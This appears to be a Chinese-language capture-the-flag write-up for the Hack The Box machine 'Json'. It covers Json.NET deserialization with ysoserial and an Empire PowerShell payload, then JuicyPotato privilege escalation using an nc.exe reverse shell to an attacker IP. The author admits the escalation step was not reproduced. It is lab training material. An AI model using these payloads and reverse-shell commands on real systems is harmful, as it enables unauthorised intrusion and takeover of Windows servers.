Hack the box-Json

简介: Hack the box-Json

大家好,今天给大家带来的CTF挑战靶机是来自hackthebox的“Json”,hackthebox是一个非常不错的在线实验平台,能帮助你提升渗透测试技能和黑盒测试技能,平台上有很多靶机,从易到难,各个级别的靶机都有。本级靶机难度为中等级别,任务是找到靶机上的user.txt和root.txt。

摘要

  • Json.net 反序列 getshell
  • JuicePotato 提权

信息收集

       nmap 扫出了 22 , 80 端口

nmap -sC -sV -p- -T4 10.10.10.158
Host is up (0.052s latency).
Not shown: 65521 closed ports
PORT      STATE SERVICE      VERSION
21/tcp    open  ftp          FileZilla ftpd
| ftp-syst:
|_  SYST: UNIX emulated by FileZilla
80/tcp    open  http         Microsoft IIS httpd 8.5
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/8.5
|_http-title: Json HTB
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49154/tcp open  msrpc        Microsoft Windows RPC
49156/tcp open  msrpc        Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

  主页登录盲猜弱口令

admin:admin

进去管理系统没什么功能

      登录框抓包发现猫腻

640.jpg

       改包为GET后发现bearer参数

      bearer参数是json类型

      把 json 参数打乱

{"Id":1,"UserName":"admin","Password":"21232f297a57a5a743894a0e4a801fc3",hello world}

640.jpg

Json.net反序列 getshell

       发现json.net反序列

      利用 ysoserial.exe 进行参数注入getshell

      ysoserial.exe 配合 empire的powershell payload 获取shell

empire下操作:
./empire
uselistener http
set Host http://10.10.xx.xx:4444
set Port 4444
execute
back
launcher powershell
>>获得$$Empire payload$$
windows下操作:
ysoserial.exe -g ObjectDataProvider -f json.net -c "$$Empire Payload$$" -o base64

640.png

获取user.txt

Juice potato 提权

       检查windows版本

(empire:XXXXXXX)shell systeminfo | findstr Windows
OS Name:                   Microsoft Windows Server 2012 R2 Datacenter

       用户有 SeImpersonatePrivilege 权限

(empire:XXXXXXX)shell whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeAuditPrivilege              Generate security audits                  Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled

windows server 2019之前可以使用 juicypotato 提权工具

 依靠 SeImpersonatePrivilege 权限,我们应该可以提到 system 权限

nc -lvp 4444
(empire:XXXXXXX)cd \windows\temp
(empire:XXXXXXX)shell copy \\10.10.xx.xx\n00B\JuicyPotato.exe .
(empire:XXXXXXX)shell copy \\10.10.xx.xx\n00B\nc.exe .
(empire:XXXXXXX)shell echo c:\windows\temp\nc.exe 10.10.xx.xx 4444 -e cmd.exe > start.bat
(empire:XXXXXXX)shell JuicyPotato.exe -l 1337 -p C:\\windows\temp\start.bat -t * -c {e60687f7-01a1-40aa-86ac-db1cbf673334}

获取root.txt,提权过程没时间复现,思路是对的。


相关文章
|
安全 Shell 网络安全
基于Vulnhub靶场—DC4渗透测试过程
Vulhub是一个开源项目,专注于安全漏洞的复现和学习。包括Web应用、容器和操作系统漏洞。项目特点包括丰富的漏洞场景、详细的复现指南、便捷的环境部署和持续更新。通过Vulhub,安全从业者可以学习和研究漏洞利用技术。此外,文章还介绍了如何下载和搭建Vulhub靶机DC-4,并详细描述了利用Burp Suite进行密码爆破和命令执行,最终获取root权限的过程。
2153 0
|
9月前
|
人工智能 自然语言处理 安全
2025国内AI数字人企业的权威排名与综合对比
本文将深入探讨2025年国内AI数字人企业的权威排名,并提供综合对比选择建议。通过分析各大厂商的优势与不足,帮助读者轻松识别市场中的领先者和潜力股,以便在快速发展的AI数字人领域做出明智的选择。无论是企业决策者还是行业研究者,均能从中获取宝贵的参考信息。
344 0
|
缓存 JavaScript Java
SpringBoot集成onlyoffice实现word文档编辑保存
SpringBoot集成onlyoffice实现word文档编辑保存
3229 0
|
12月前
|
NoSQL Java 调度
分布式锁与分布式锁使用 Redis 和 Spring Boot 进行调度锁(不带 ShedLock)
分布式锁是分布式系统中用于同步多节点访问共享资源的机制,防止并发操作带来的冲突。本文介绍了基于Spring Boot和Redis实现分布式锁的技术方案,涵盖锁的获取与释放、Redis配置、服务调度及多实例运行等内容,通过Docker Compose搭建环境,验证了锁的有效性与互斥特性。
940 0
分布式锁与分布式锁使用 Redis 和 Spring Boot 进行调度锁(不带 ShedLock)
|
前端开发 Java API
如何开发一套物业管理(园区式)系统?(附架构图+流程图+代码参考)
现代物业管理系统通过数字化手段提升管理效率,优化资源配置,助力小区、写字楼等场所实现高效、规范管理。本文详解系统功能设计、技术选型、开发流程及代码实现(Java + Spring Boot),并附常见问题解答,助你快速构建稳定、可扩展的物业管理平台。
|
人工智能 JSON 自然语言处理
AppFlow全面支持Qwen2.5开源版无代码调用
Qwen2.5是阿里云推出的大型语言模型,无需编码即可快速体验。该模型基于最新大规模数据集训练,支持超29种语言,显著提升了知识量、编码及数学能力,特别是在指令遵循、长文本生成、结构化数据理解和生成等方面。通过AppFlow,Qwen2.5可轻松集成至钉钉机器人等应用,实现智能化交互。
855 4
|
安全 Unix Linux
VMware Workstation 17.6.3 发布下载,现在完全免费无论个人还是商业用途
VMware Workstation 17.6.3 发布下载,现在完全免费无论个人还是商业用途
160932 65
|
机器学习/深度学习 存储 数据可视化
【AAAI2024】M2SD:通过特征空间预构建策略重塑小样本类增量学习
小样本类增量学习代表了机器学习领域中一个高度挑战性的议题,其核心目标在于能够在仅有限的数据支持下识别新类别,同时保留对已学习类别的认知,而无须重新训练整个模型。这一目标在模型需适应新类别的同时使用有限训练数据的情况下尤为艰巨。针对上述挑战,我们提出了一种创新性策略,称为多重混合自蒸馏。旨在为类增量学习阶段准备一个具有高度可扩展性和包容性的特征空间。
|
存储 算法 索引
【头歌·计组·自己动手画CPU】三、存储系统设计(HUST)(理论版) 【计算机硬件系统设计】
【头歌·计组·自己动手画CPU】三、存储系统设计(HUST)(理论版) 【计算机硬件系统设计】
3248 1
|
网络安全 数据安全/隐私保护
SNMP客户端MIB Browser的使用
SNMP客户端MIB Browser的使用
6519 0